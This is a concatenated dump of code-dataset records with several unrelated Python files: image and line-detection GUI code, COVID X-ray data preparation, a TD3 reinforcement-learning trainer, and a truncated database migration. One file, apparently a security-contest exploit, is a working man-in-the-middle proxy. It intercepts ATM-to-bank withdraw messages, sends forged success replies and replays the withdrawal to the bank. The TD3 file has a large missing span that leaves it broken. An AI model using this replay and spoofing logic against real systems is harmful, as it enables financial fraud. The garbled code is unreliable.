grid[row][i]\n\t\t\tupAndRightDiag = grid[row][i]\n\n\t\t\tfor j in range(1, n):\n\t\t\t\tvertProd *= grid[(row + j) % length][i]\n\t\t\t\thorizProd *= grid[row][(i + j) % length]\n\t\t\t\tdownandRightDiag *= grid[(row + j) % length][(i + j) % length]\n\t\t\t\tupAndRightDiag *= grid[(row - j)][(i + j) % length]\n\n\t\t\tmaxHorizProd = max(maxHorizProd, horizProd)\n\t\t\tmaxVertProd = max(maxVertProd, vertProd)\n\t\t\tmaxDownAndRightDiag = max(maxDownAndRightDiag, downandRightDiag)\n\t\t\tmaxUpAndRightDiag = max(maxUpAndRightDiag, upAndRightDiag)\n\n\treturn max(maxHorizProd, maxVertProd, maxDownAndRightDiag, maxUpAndRightDiag)\n\n\ndef findLargestProd(filename, n):\n\tgrid = readData2(filename)\n\treturn findMaxProd(grid, n)\n\ndef main():\n\tprint(findLargestProd(\"LargeGridProd.in\", 
4))\n\nmain()","sub_path":"Python/LargeGridProd.py","file_name":"LargeGridProd.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"71538276","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom pubsub import pub\r\nfrom PIL import Image\r\nfrom PIL import ImageTk\r\nclass View:\r\n\r\n def __init__(self, parent):\r\n # initialize variables\r\n self.container = parent\r\n self.flagLoadImage = FALSE\r\n self.hut_width = 40\r\n self.hut_height = 56\r\n\r\n #Publishes a message to notify the Controller.\r\n\r\n #Uses PyPubSub to publish a message to a topic Radio_button_pressed.\r\n #The 'subscriber' here is the Controller which gets notified.\r\n\r\n\r\n def setup(self): # run first\r\n \"\"\"Calls methods to setup the user interface.\"\"\"\r\n self.create_widgets()\r\n self.setup_layout()\r\n\r\n def loadImg(self):\r\n pub.sendMessage(\"OpenFile_Button_Pressed\")\r\n self.flagLoadImage = TRUE\r\n\r\n\r\n def create_widgets(self):\r\n \"\"\"Create various widgets in the tkinter main window.\"\"\"\r\n self.var = tk.IntVar()\r\n self.background_label = tk.Label(self.container)\r\n self.topFrame = Frame(self.container,borderwidth=2,highlightbackground=\"black\",highlightcolor=\"red\",highlightthickness=1,width=300, height=600)\r\n self.bottomFrame = Frame(self.container,borderwidth=2,highlightbackground=\"black\",highlightcolor=\"red\",highlightthickness=1,width=500, height=600)\r\n self.topFrame2 = Frame(self.topFrame)\r\n #button\r\n self.b1LoadImg = tk.Button(self.topFrame2, text = \"Load Image\",command = self.loadImg)\r\n self.b2LineDetect = tk.Button(self.topFrame2,text = \"Line Detection\",command = self.lineDetect)\r\n #scale bar\r\n self.scale1 = tk.Scale(self.topFrame, from_=1, to=20, orient = HORIZONTAL, length = 500,label ='pixel', command = self.scalerChange)\r\n self.scale1.set(1)\r\n self.scale2 = tk.Scale(self.topFrame, from_=1, to=130, orient = HORIZONTAL, length = 500,label ='threshold', command = self.scalerChange)\r\n self.scale2.set(50)\r\n self.scale3 = tk.Scale(self.topFrame, from_=1, to=500, orient = HORIZONTAL, length = 500,label ='mini line length', command = self.scalerChange)\r\n self.scale3.set(10)\r\n self.scale4 = tk.Scale(self.topFrame, from_=1, to=100, orient=HORIZONTAL, length=500, label='max line gap', command = self.scalerChange)\r\n self.scale4.set(50)\r\n #image panel\r\n self.panelA = tk.Label(self.bottomFrame, text = 'image here')\r\n \r\n\r\n\r\n def setup_layout(self):\r\n self.topFrame.pack(side = TOP)\r\n self.bottomFrame.pack (side=BOTTOM)\r\n self.topFrame2.pack(side = TOP)\r\n self.b1LoadImg.pack( side=LEFT)\r\n self.b2LineDetect.pack(side = RIGHT)\r\n self.scale4.pack(side=BOTTOM) #max line gap\r\n self.scale3.pack(side=BOTTOM) #min line lenght\r\n self.scale2.pack(side=BOTTOM) #threshold\r\n self.scale1.pack(side=BOTTOM) # pixel\r\n self.panelA.pack()\r\n\r\n \r\n def updateImg (self,img):\r\n self.panelA.configure(image=img)\r\n self.panelA.image = img\r\n return\r\n def scalerChange (self, val):\r\n if (self.flagLoadImage):\r\n pub.sendMessage(\"LineDetect_Button_Pressed\")\r\n def lineDetect(self):\r\n pub.sendMessage(\"LineDetect_Button_Pressed\")\r\n#test view\r\nif __name__ == \"__main__\":\r\n mainwin = tk.Tk()\r\n WIDTH = 800\r\n HEIGHT = 600\r\n mainwin.geometry(\"%sx%s\" % (WIDTH, HEIGHT))\r\n #mainwin.resizable(0, 0)\r\n mainwin.title(\"Open 
CV\")\r\n\r\n view=View(mainwin)\r\n view.setup()\r\n mainwin.mainloop()","sub_path":"hnzView.py","file_name":"hnzView.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103615286","text":"\"\"\"\nScript to prepare combined dataset\nClass 0: Normal\nClass 1: Bacterial Pneumonia\nClass 2: Viral Pneumonia\nClass 3: COVID-19\n\"\"\"\nimport glob\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--combine_pneumonia\", action='store_true', default=False)\nparser.add_argument(\"--use_generated\", type=bool, default=False)\nargs = parser.parse_args()\n\nCOVID19_DATA_PATH = \"./data/covid19\"\nCOVID19_AR_DATA_PATH = \"./data/covid19_ar\"\nPNEUMONIA_DATA_PATH = \"./data/Data/chest-xray-pneumonia/chest_xray/\"\nGENERATED_DATA_PATH = \"./data/Data/covid-generated\"\nDATA_PATH = \"./data\"\n\n# Assert that the data directories are present\nfor d in [COVID19_DATA_PATH, COVID19_AR_DATA_PATH, PNEUMONIA_DATA_PATH, DATA_PATH]:\n try:\n assert os.path.isdir(d) \n except:\n print (\"Directory %s does not exists\" % d)\n\ndef create_list (split, use_generated=False):\n \n\n assert split in ['train', 'test', 'val']\n l = []\n\n # add generated images\n if ((use_generated==True) and (split=='train')):\n for f in glob.glob(os.path.join(GENERATED_DATA_PATH, 'genxray_*')):\n f = f.replace(\"\\\\\", \"/\")\n l.append((f, 3)) # Class 0\n\n # Prepare list using kaggle pneumonia dataset\n for f in glob.glob(os.path.join(PNEUMONIA_DATA_PATH, split, 'NORMAL', '*')):\n f = f.replace(\"\\\\\", \"/\")\n l.append((f, 0)) # Class 0\n\n for f in glob.glob(os.path.join(PNEUMONIA_DATA_PATH, split, 'PNEUMONIA', '*')):\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 1)) # Class 1\n else:\n if 'bacteria' in f:\n l.append((f, 1)) # Class 1\n else:\n l.append((f, 2)) # Class 2\n\n # Prepare list using covid dataset\n covid_file = os.path.join(COVID19_DATA_PATH, '%s_list.txt'%split)\n with open(covid_file, 'r') as cf:\n for f in cf.readlines():\n f = f.replace(\"\\n\", \"\")\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 2)) # Class 2\n else:\n l.append((f, 3)) # Class 3\n\n # Prepare list using covid AR dataset\n \n covid_ar_file = os.path.join(COVID19_AR_DATA_PATH, '%s_list.txt'%split)\n with open(covid_ar_file, 'r') as cf:\n for f in cf.readlines():\n f = f.replace(\"\\n\", \"\")\n f = f.replace(\"\\\\\", \"/\")\n if args.combine_pneumonia:\n l.append((f, 2)) # Class 2\n else:\n l.append((f, 3)) # Class 3\n\n if ((use_generated==True) and (split=='train')):\n write_file = 'train_generated.txt'\n else:\n write_file = '%s.txt'%split\n with open(os.path.join(DATA_PATH, write_file), 'w') as f:\n for item in l:\n f.write(\"%s %d\\n\" % item)\n\nfor split in ['train', 'test', 'val']:\n create_list(split, args.use_generated)\n","sub_path":"cnn_classifier/data_tools/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"410355382","text":"import pybullet_envs\r\nfrom gym import make\r\nfrom collections import deque\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom torch.optim import Adam\r\nimport random\r\nimport copy\r\nimport wandb\r\n\r\nGAMMA = 0.99\r\nTAU = 0.002\r\nCRITIC_LR = 5e-4\r\nACTOR_LR = 2e-4\r\nDEVICE = torch.device('cuda' if 
torch.cuda.is_available() else 'cpu')\r\nBATCH_SIZE = 128\r\nENV_NAME = \"AntBulletEnv-v0\"\r\nTRANSITIONS = 1000000\r\nDELAY = 4\r\nPOLICY_NOISE = 0.05\r\nNOISE_CLIP = 0.2\r\nEPSILON = 0.1\r\nUSE_HUBER = True\r\n\r\nCONFIG = {\r\n key: value for key, value in locals().copy().items() if key.isupper() and not str(value).startswith(\" BATCH_SIZE * 16:\r\n self.total_it += 1\r\n log_dict = dict()\r\n # Sample batch\r\n transitions = [self.replay_buffer[random.randint(0, len(self.replay_buffer)-1)] for _ in range(BATCH_SIZE)]\r\n state, action, next_state, reward, done = zip(*transitions)\r\n state = torch.tensor(np.array(state), device=DEVICE, dtype=torch.float)\r\n action = torch.tensor(np.array(action), device=DEVICE, dtype=torch.float)\r\n next_state = torch.tensor(np.array(next_state), device=DEVICE, dtype=torch.float)\r\n reward = torch.tensor(np.array(reward), device=DEVICE, dtype=torch.float)\r\n done = torch.tensor(np.array(done), device=DEVICE, dtype=torch.float)\r\n \r\n # Update critic\r\n log_dict['critic'] = self.update_critic(state, action, reward, next_state, done)\r\n \r\n # Update actor\r\n if (self.total_it % DELAY) == 0:\r\n log_dict['actor'] = self.update_actor(state)\r\n\r\n soft_update(self.target_critic_1, self.critic_1)\r\n soft_update(self.target_critic_2, self.critic_2)\r\n soft_update(self.target_actor, self.actor)\r\n if wandb.run:\r\n wandb.log({'optim_step': self.total_it, **log_dict})\r\n\r\n def update_critic(self, state, action, reward, next_state, done):\r\n q_1 = self.critic_1(state, action)\r\n q_2 = self.critic_2(state, action)\r\n log_dict = dict()\r\n with torch.no_grad():\r\n next_action = self.target_actor(next_state)\r\n noise = (\r\n torch.randn_like(action) * POLICY_NOISE\r\n ).clamp(-NOISE_CLIP, NOISE_CLIP)\r\n next_action = (next_action + noise).clamp(-1, 1)\r\n\r\n next_q_1 = self.target_critic_1(next_state, next_action)\r\n next_q_2 = self.target_critic_2(next_state, next_action)\r\n\r\n target = torch.minimum(next_q_1, next_q_2) * GAMMA\r\n target = target * (1 - done)\r\n target += reward\r\n\r\n if USE_HUBER:\r\n critic_loss1 = F.smooth_l1_loss(q_1, target)\r\n critic_loss2 = F.smooth_l1_loss(q_2, target)\r\n else:\r\n critic_loss1 = F.mse_loss(q_1, target)\r\n critic_loss2 = F.mse_loss(q_2, target)\r\n log_dict['critic_loss1'] = critic_loss1.cpu().item()\r\n log_dict['critic_loss2'] = critic_loss2.cpu().item()\r\n\r\n log_dict['critic1_grad'] = self.update_nn(self.critic_1_optim, critic_loss1, self.critic_1)\r\n log_dict['critic2_grad'] = self.update_nn(self.critic_2_optim, critic_loss2, self.critic_2)\r\n return log_dict\r\n\r\n def update_actor(self, state):\r\n log_dict = dict()\r\n pred_action = self.actor(state)\r\n q_value = self.critic_1(state, pred_action)\r\n q_mean = -torch.mean(q_value)\r\n actor_loss = q_mean\r\n log_dict['actor_loss'] = actor_loss.cpu().item()\r\n\r\n log_dict['actor_grad'] = self.update_nn(self.actor_optim, actor_loss, self.actor)\r\n return log_dict\r\n\r\n @staticmethod\r\n def update_nn(optim, loss, model):\r\n optim.zero_grad()\r\n loss.backward()\r\n optim.step()\r\n\r\n total_norm = 0.0\r\n for p in model.parameters():\r\n param_norm = p.grad.detach().data.norm(2)\r\n total_norm += param_norm.item() ** 2\r\n total_norm = total_norm ** 0.5\r\n return total_norm\r\n\r\n def act(self, state):\r\n with torch.no_grad():\r\n state = torch.tensor(np.array([state]), dtype=torch.float, device=DEVICE)\r\n return self.actor(state).cpu().numpy()[0]\r\n\r\n def save(self, reward):\r\n 
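# persist actor and critic weights, tagging the filenames with the evaluation reward\r\n        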
torch.save(self.actor.state_dict(), f\"actor_{reward:.2f}.pkl\")\r\n torch.save(self.critic_1.state_dict(), f\"critic_{reward:.2f}.pkl\")\r\n\r\n def load(self, actor_path, critic_path):\r\n if actor_path:\r\n actor_weight = torch.load(actor_path, map_location=DEVICE)\r\n self.actor.load_state_dict(actor_weight)\r\n\r\n if critic_path:\r\n critic_weight = torch.load(critic_path, map_location=DEVICE)\r\n self.critic_1.load_state_dict(critic_weight)\r\n self.critic_2.load_state_dict(critic_weight)\r\n\r\n self.target_critic_1 = copy.deepcopy(self.critic_1)\r\n self.target_critic_2 = copy.deepcopy(self.critic_2)\r\n\r\n\r\ndef evaluate_policy(env, agent, episodes=5):\r\n returns = []\r\n for _ in range(episodes):\r\n done = False\r\n state = env.reset()\r\n total_reward = 0.\r\n \r\n while not done:\r\n state, reward, done, _ = env.step(agent.act(state))\r\n total_reward += reward\r\n returns.append(total_reward)\r\n return returns\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n wandb.init(\r\n entity='ermekaitygulov',\r\n anonymous='allow',\r\n project='RL-HW3',\r\n force=False,\r\n config=CONFIG\r\n )\r\n except wandb.errors.error.UsageError:\r\n pass\r\n env = make(ENV_NAME)\r\n test_env = make(ENV_NAME)\r\n td3 = TD3(state_dim=env.observation_space.shape[0], action_dim=env.action_space.shape[0])\r\n state = env.reset()\r\n\r\n episodes_sampled = 0\r\n steps_sampled = 0\r\n\r\n max_reward = -np.inf\r\n train_reward = 0\r\n\r\n for i in range(TRANSITIONS):\r\n steps = 0\r\n \r\n #Epsilon-greedy policy\r\n action = td3.act(state)\r\n action = np.clip(action + EPSILON * np.random.randn(*action.shape), -1, +1)\r\n\r\n next_state, reward, done, _ = env.step(action)\r\n td3.update((state, action, next_state, reward, done))\r\n\r\n state = next_state if not done else env.reset()\r\n train_reward += reward\r\n if done:\r\n wandb.log({'train_step': i + 1, 'train_reward': train_reward})\r\n train_reward = 0\r\n\r\n if (i + 1) % (TRANSITIONS//100) == 0:\r\n rewards = evaluate_policy(test_env, td3, 5)\r\n print(f\"Step: {i+1}, Reward mean: {np.mean(rewards)}, Reward std: {np.std(rewards)}\")\r\n wandb.log({'train_step': i + 1, 'val': np.mean(rewards)})\r\n if np.mean(rewards) > max_reward:\r\n td3.save(np.mean(rewards))\r\n max_reward = np.mean(rewards)\r\n\r\n","sub_path":"hw03_ant/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"556936990","text":"#!/usr/bin/env python2\nimport argparse\nimport signal\nimport socket\nimport sys\nimport threading\nimport time\nfrom contextlib import contextmanager\n\nimport requests\n\nrunning = True\nlocalSocket = None\n\nCLIENT2SERVER = 1\nSERVER2CLIENT = 2\n\nmessageCountClientServer = 0\nmessageCountServerClient = 0\n\nwithdrawSuccess = \"\"\nwithdrawSuccessAck = \"\"\nwithdraw = \"\"\nwithdrawEOF = \"\"\n\ndef printErr(str, file):\n print >> sys.stderr, str\n\ndef pre_mitm(buff, direction, client, server):\n message = str(buff)\n\n if message[-1] == \".\" and len(message) > 1:\n sliced = message[:len(message) - 1]\n mitm(sliced, direction, client, server)\n slice2 = \".\"\n mitm(slice2, direction, client, server)\n\n else:\n mitm(buff, direction, client, server)\n\n\ndef mitm(buff, direction, client, server):\n global messageCountClientServer, messageCountServerClient\n global withdrawSuccess, withdrawSuccessEOF, withdrawSuccessAck\n global withdraw, withdrawEOF\n\n out = {\"message\": buff, \"sendTo\": server}\n if direction == 
CLIENT2SERVER:\n        messageCountClientServer += 1\n        if messageCountClientServer == 9:\n            printErr('Failing withdraw: ' + str(out[\"message\"]), file=sys.stderr)\n            withdraw = out[\"message\"]\n            out.clear()\n        if messageCountClientServer == 10:\n            printErr('Failing withdraw EOF: ' + str(out[\"message\"]), file=sys.stderr)\n            withdrawEOF = out[\"message\"]\n            printErr('Send \"success\" to client: ' + str(withdrawSuccess), file=sys.stderr)\n            client.send(withdrawSuccess)\n            printErr('Send \"success EOF\" to client: ' + str(withdrawSuccessEOF), file=sys.stderr)\n            client.send(withdrawSuccessEOF)\n            out.clear()\n        if messageCountClientServer == 11:\n            printErr('Withdraw ACK: ' + str(out[\"message\"]), file=sys.stderr)\n            withdrawSuccessAck = out[\"message\"]\n            out.clear()\n        \n        if messageCountClientServer == 12:\n            printErr('Withdraw ACK_EOF: ' + str(out[\"message\"]), file=sys.stderr)\n            withdrawSuccessAck = withdrawSuccessAck + out[\"message\"]\n            printErr('Withdraw concatenated: ' + str(withdrawSuccessAck), file=sys.stderr)\n            out.clear()\n\n    elif direction == SERVER2CLIENT:\n        messageCountServerClient += 1\n        printErr('s2c - ' + str(messageCountServerClient) + ' :' + str(out[\"message\"]), file=sys.stderr)\n        if messageCountServerClient == 3:\n            printErr('Withdraw success: ' + str(out[\"message\"]), file=sys.stderr)\n            withdrawSuccess = out[\"message\"]\n        if messageCountServerClient == 4:\n            printErr('Withdraw EOF: ' + str(out[\"message\"]), file=sys.stderr)\n            withdrawSuccessEOF = out[\"message\"]\n\n    if out and out[\"sendTo\"] is not None:\n        if direction == CLIENT2SERVER:\n            if out[\"sendTo\"] is client:\n                printErr('Send from atm to atm: ' + str(out[\"message\"]), file=sys.stderr)\n            else:\n                printErr('Send from atm to bank: ' + str(out[\"message\"]), file=sys.stderr)\n        elif direction == SERVER2CLIENT:\n            if out[\"sendTo\"] is client:\n                printErr('Send from bank to bank: ' + str(out[\"message\"]), file=sys.stderr)\n            else:\n                printErr('Send from bank to atm: ' + str(out[\"message\"]), file=sys.stderr)\n\n        out[\"sendTo\"].send(out[\"message\"])\n\n    return\n\n\n@contextmanager\ndef ignored(*exceptions):\n    try:\n        yield\n    except exceptions:\n        pass\n\n\ndef killpn(a, b, n):\n    if n != CLIENT2SERVER:\n        killp(a, b)\n\n\ndef killp(a, b):\n    global messageCountClientServer, messageCountServerClient\n    with ignored(Exception):\n        a.shutdown(socket.SHUT_RDWR)\n        a.close()\n        b.shutdown(socket.SHUT_RDWR)\n        b.close()\n    return\n\n\ndef worker(client, server, n):\n    while running:\n        b = \"\"\n        with ignored(Exception):\n            b = client.recv(1024)\n        if len(b) == 0:\n            killpn(client, server, n)\n            return\n        try:\n            pre_mitm(b, n, client, server)\n        except:\n            printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n            killpn(client, server, n)\n            return\n    killp(client, server)\n    return\n\n\ndef send_get_balance_to_command_server(command_server_host, command_server_port):\n    printErr(str.format(\"Send -g command to {0}:{1}\", command_server_host, str(command_server_port)), file=sys.stderr)\n    try:\n        requests.post(\"http://\" + command_server_host + \":\" + str(command_server_port),\n                      data={\"REQUEST\": '{\"type\": \"input\",'\n                                       '\"input\":{' +\n                                       '\"input\": [\"-p\",\"%PORT%\",\"-i\",\"%IP%\",\"-a\",\"ted\",\"-g\"]}' +\n                                       '}'})\n    except:\n        printErr(\"Unable to reach command server.\", file=sys.stderr)\n    return\n\n\ndef send_done_to_command_server(command_server_host, command_server_port):\n    time.sleep(30)\n    printErr(str.format(\"Send done to {0}:{1}\", command_server_host, str(command_server_port)), file=sys.stderr)\n    try:\n        printErr(\"http://\" + 
command_server_host + \":\" + str(command_server_port), file=sys.stderr)\n response = requests.post(\"http://\" + command_server_host + \":\" + str(command_server_port),\n data={\"REQUEST\": '{\"type\": \"done\"}'})\n printErr(\"Response from command is: \" +str(response), file=sys.stderr)\n except:\n printErr(\"Unable to reach command server.\", file=sys.stderr)\n return\n\n\ndef replay_attack_and_finalize(bank_host, bank_port, command_host, command_port):\n global withdraw, withdrawEOF, withdrawSuccessAck\n\n bank = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n bank.connect((bank_host, bank_port))\n printErr('Sent fake withdraw to bank: ' + str(withdraw), file=sys.stderr)\n bank.send(withdraw)\n printErr('Sent fake withdraw EOF to bank: ' + str(withdrawEOF), file=sys.stderr)\n bank.send(withdrawEOF)\n\n try:\n b = bank.recv(1024)\n printErr('Success of spoofed withdraw: ' + str(b), file=sys.stderr)\n b = bank.recv(1024)\n printErr('Success of spoofed withdraw EOF: ' + str(b), file=sys.stderr)\n\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n\n bank = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n bank.connect((bank_host, bank_port))\n bank.sendall(withdrawSuccessAck)\n except:\n printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n return\n bank.shutdown(socket.SHUT_RDWR)\n bank.close()\n\n send_get_balance_to_command_server(command_host, command_port)\n return\n\n\ndef signalhandler(sn, sf):\n global running, localSocket\n running = False\n localSocket.shutdown(socket.SHUT_RDWR)\n localSocket.close()\n\n\ndef doProxyMain(port, remotehost, remoteport, command_server_host, command_server_port):\n global messageCountClientServer, messageCountServerClient\n global localSocket\n\n signal.signal(signal.SIGTERM, signalhandler)\n\n message_counter = 0\n workers = []\n\n try:\n localSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n localSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n localSocket.bind((\"0.0.0.0\", port))\n localSocket.listen(1)\n\n while message_counter < 4:\n message_counter += 1\n\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n while message_counter < 6:\n message_counter += 1\n\n k, a = localSocket.accept()\n t1 = threading.Thread(target=worker, args=(k, None, CLIENT2SERVER))\n t1.start()\n workers.append((t1, None, k, None))\n\n while message_counter < 8:\n message_counter += 1\n\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n \n threading.Thread(target=replay_attack_and_finalize,\n args=(remotehost, remoteport, command_server_host, command_server_port)).start()\n\n 
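# send_done_to_command_server sleeps 30 seconds before POSTing, so the done signal lands only after the replay above has run\n        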
threading.Thread(target=send_done_to_command_server, args=(command_server_host, command_server_port)).start()\n\n while running is True:\n k, a = localSocket.accept()\n v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n v.connect((remotehost, remoteport))\n printErr(str.format(\"Starting threads for message {2}: s2c: {0} | c2s {1}\",\n messageCountServerClient, messageCountClientServer, message_counter), file=sys.stderr)\n t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER))\n t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT))\n t2.start()\n t1.start()\n workers.append((t1, t2, k, v))\n\n except KeyboardInterrupt:\n signalhandler(None, None)\n except:\n printErr(str.format(\"Unexpected error: {0}\", sys.exc_info()[0]), file=sys.stderr)\n pass\n\n for t1, t2, k, v in workers:\n killp(k, v)\n if t1 is not None:\n t1.join()\n if t2 is not None:\n t2.join()\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Proxy')\n parser.add_argument('-p', type=int, default=4000, help=\"listen port\")\n parser.add_argument('-s', type=str, default=\"127.0.0.1\", help=\"server ip address\")\n parser.add_argument('-q', type=int, default=3000, help=\"server port\")\n parser.add_argument('-c', type=str, default=\"127.0.0.1\", help=\"command server\")\n parser.add_argument('-d', type=int, default=5000, help=\"command port\")\n args = parser.parse_args()\n print('started\\n')\n sys.stdout.flush()\n doProxyMain(args.p, args.s, args.q, args.c, args.d)\n","sub_path":"exploits/integrity_16/mitm.py","file_name":"mitm.py","file_ext":"py","file_size_in_byte":10932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"621274681","text":"# -*- coding: utf-8 -*-\n\"\"\"Add keras input and output layers\n\nRevision ID: 8647edf5eaad\nRevises: 73f22f178b14\nCreate Date: 2018-10-16 14:11:56.645275\n\n\"\"\"\nfrom alembic import context\nfrom alembic import op\nfrom sqlalchemy import String, Integer, Text\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.sql import table, column, text\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = '8647edf5eaad'\ndown_revision = '73f22f178b14'\nbranch_labels = None\ndepends_on = None\n\nKERAS_PLATAFORM_ID = 5\n\n\ndef _insert_operation_category_translation():\n tb = table(\n 'operation_category_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String))\n\n columns = ('id', 'locale', 'name')\n data = [\n (5070, \"en\", 'Input/Output Layers'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_platform():\n tb = table(\n 'operation_platform',\n column('operation_id', Integer),\n column('platform_id', Integer), )\n\n columns = ('operation_id', 'platform_id')\n data = [\n (5071, KERAS_PLATAFORM_ID),#Input\n (5072, KERAS_PLATAFORM_ID),#Output\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_category():\n tb = table(\n 'operation_category',\n column('id', Integer),\n column('type', String),\n column('order', Integer),\n column('default_order', Integer),\n )\n\n columns = ('id', 'type', 'order', 'default_order')\n data = [\n (5070, \"group\", 7, 7),\n (5071, \"subgroup\", 1, 1),\n (5072, \"subgroup\", 2, 2),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation():\n tb = table(\n 'operation',\n column('id', Integer),\n 
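# lightweight table stub for bulk_insert: it lists only the columns this migration writes\n        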
column('slug', String),\n column('enabled', Integer),\n column('type', String),\n column('icon', Integer),)\n\n columns = ('id', 'slug', 'enabled', 'type', 'icon')\n data = [\n (5071, \"input\", 1, 'ACTION', ''),\n (5072, \"output\", 1, 'ACTION', ''),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_category_operation():\n tb = table(\n 'operation_category_operation',\n column('operation_id', Integer),\n column('operation_category_id', Integer))\n\n columns = ('operation_category_id', 'operation_id')\n data = [\n (5070, 5071),\n (5070, 5072),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_translation():\n tb = table(\n 'operation_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String),\n column('description', String))\n\n columns = ('id', 'locale', 'name', 'description')\n data = [\n (5071, \"en\", \"Input\", ''),\n (5072, \"en\", \"Output\", ''),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port():\n tb = table(\n 'operation_port',\n column('id', Integer),\n column('type', String),\n column('tags', String),\n column('order', Integer),\n column('multiplicity', String),\n column('operation_id', Integer),\n column('slug', String),)\n\n columns = ('id', 'type', 'tags', 'order', 'multiplicity', 'operation_id', 'slug')\n data = [\n #Input\n (5271, 'OUTPUT', '', 1, 'ONE', 5071, 'output data'),\n #Output\n (5172, 'INPUT', '', 1, 'ONE', 5072, 'input data'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port_interface_operation_port():\n tb = table(\n 'operation_port_interface_operation_port',\n column('operation_port_id', Integer),\n column('operation_port_interface_id', Integer))\n\n columns = ('operation_port_id', 'operation_port_interface_id')\n data = [\n #input\n (5271, 1),\n #Output\n (5172, 1),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_port_translation():\n tb = table(\n 'operation_port_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String),\n column('description', String))\n\n columns = ('id', 'locale', 'name', 'description')\n data = [\n (5271, \"en\", 'output data', 'Output data'),\n (5172, \"en\", 'input data', 'Input data'),\n ]\n rows = [dict(list(zip(columns, row))) for row in data]\n\n op.bulk_insert(tb, rows)\n\n\ndef _insert_operation_form():\n operation_form_table = table(\n 'operation_form',\n column('id', Integer),\n column('enabled', Integer),\n column('order', Integer),\n column('category', String), )\n\n columns = ('id', 'enabled', 'order', 'category')\n data = [\n #Input\n (5171, 1, 1, 'execution'),\n (5172, 1, 2, 'execution'),\n (5173, 1, 3, 'execution'),\n (5174, 1, 4, 'execution'),\n (5175, 1, 5, 'execution'),\n (5176, 1, 6, 'execution'),\n (5177, 1, 6, 'execution'),\n ]\n\n rows = [dict(list(zip(columns, row))) for row in data]\n op.bulk_insert(operation_form_table, rows)\n\n\ndef _insert_operation_form_translation():\n tb = table(\n 'operation_form_translation',\n column('id', Integer),\n column('locale', String),\n column('name', String))\n\n columns = ('id', 'locale', 'name')\n data = [\n #Input\n (5171, 'en', 'Execution'),\n (5171, 'pt', 'Execução'),\n (5172, 'en', 'Execution'),\n (5172, 'pt', 'Execução'),\n (5173, 'en', 'Execution'),\n (5173, 
